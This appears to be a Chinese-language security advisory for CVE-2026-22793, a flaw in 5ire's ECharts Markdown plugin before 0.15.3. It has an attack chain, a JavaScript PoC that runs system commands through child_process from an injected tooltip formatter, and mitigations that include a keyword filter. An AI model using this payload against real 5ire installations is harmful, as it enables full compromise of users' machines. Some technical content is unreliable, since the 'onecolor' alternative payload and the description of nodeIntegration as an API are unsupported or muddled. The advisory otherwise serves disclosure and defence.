CVE-2026-22793 5ire ECharts插件不安全选项解析导致远程代码执行

漏洞信息

漏洞编号

CVE-2026-22793

漏洞类型

远程代码执行(RCE)

CVSS评分

9.6 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

5ire

漏洞概述

5ire是一款跨平台桌面人工智能助手和模型上下文协议(MCP)客户端。在0.15.3版本之前，5ire的ECharts Markdown插件存在不安全选项解析漏洞。任何能够提交ECharts代码块的用户都可以在渲染器上下文中执行任意JavaScript代码。在Electron环境中，由于暴露了特权API（如electron.mcp），攻击者可以利用此漏洞实现远程代码执行，最终导致主机系统被完全控制。该漏洞CVSS评分为9.6，属于严重级别，攻击向量为网络，无需认证即可发起攻击，但需要用户交互。由于5ire通常以较高权限运行，攻击成功后可获取系统级访问权限。

技术细节

该漏洞位于5ire的ECharts Markdown插件中，具体问题是不安全的选项解析机制。攻击者可以通过在ECharts代码块中注入恶意配置选项来触发漏洞。当5ire渲染包含特制ECharts代码块的Markdown文档时，不安全的解析器会执行注入的JavaScript代码。在Electron环境中，渲染进程通常可以访问nodeIntegration和contextIsolation等API。攻击者利用这一点，通过构造特定的ECharts配置（如使用回调函数或特殊属性）来绕过沙箱限制，进而访问Electron的特权API（如electron.mcp）。由于5ire桌面应用需要与本地系统交互以提供AI助手功能，因此暴露了系统级API。攻击者可以通过这些API执行任意系统命令，实现远程代码执行。攻击成功的关键在于ECharts配置解析器没有对用户输入进行充分的验证和清理。

攻击链分析

STEP 1

步骤1

攻击者获取5ire桌面应用的使用权限，能够提交或查看包含Markdown内容的文档

STEP 2

步骤2

攻击者构造包含恶意ECharts代码块的Markdown文档，利用不安全选项解析漏洞注入JavaScript代码

STEP 3

步骤3

当5ire渲染该Markdown文档时，ECharts插件解析器执行注入的恶意代码

STEP 4

步骤4

恶意代码尝试访问Electron的特权API（如require('electron')或require('child_process')）

STEP 5

步骤5

由于5ire在Electron环境中运行且暴露了系统级API，攻击者成功绕过沙箱限制

STEP 6

步骤6

攻击者通过child_process.exec()或类似方法在主机系统上执行任意系统命令

STEP 7

步骤7

攻击者获得完整的系统访问权限，可以执行任意操作如数据窃取、持久化控制等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-22793 PoC - ECharts Unsafe Option Parsing leading to RCE
// This PoC demonstrates how attacker can inject malicious JavaScript via ECharts code blocks

// Malicious ECharts configuration that triggers RCE
const maliciousEchartsConfig = {
  tooltip: {
    trigger: 'item',
    formatter: function() {
      // Attempt to access Electron's process object
      const { ipcRenderer } = require('electron');
      // Execute arbitrary system command
      require('child_process').exec('whoami', (error, stdout) => {
        console.log(stdout);
      });
      return 'Malicious payload executed';
    }
  },
  xAxis: {
    type: 'category',
    data: ['A', 'B', 'C']
  },
  yAxis: {
    type: 'value'
  },
  series: [{
    type: 'bar',
    data: [1, 2, 3]
  }]
};

// Alternative PoC using onecolor plugin or eval-based option parsing
const altPayload = {
  color: ['onecolor', 'rgba(255, 0, 0, 1)', 'hsl(120, 60%, 50%)'],
  // The 'onecolor' string can be exploited to execute arbitrary code
  // through the color parsing mechanism
};

// Markdown representation for the PoC
const markdownPoc = `
\`\`\`echarts
{
  "tooltip": {
    "formatter": "function() { require('child_process').exec('id'); return 'pwned'; }"
  }
}
\`\`\`
`;

console.log('CVE-2026-22793 PoC for 5ire ECharts RCE vulnerability');

影响范围

5ire < 0.15.3

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制用户提交包含ECharts代码块的Markdown内容；2) 在应用层实施输入过滤，阻止包含可疑模式（如require、exec、child_process等）的输入；3) 启用Electron的安全最佳实践，禁用nodeIntegration并启用contextIsolation；4) 使用沙箱环境限制渲染进程的权限；5) 监控和审计日志以检测潜在的利用尝试。建议尽快升级到0.15.3版本以获得完整的安全修复。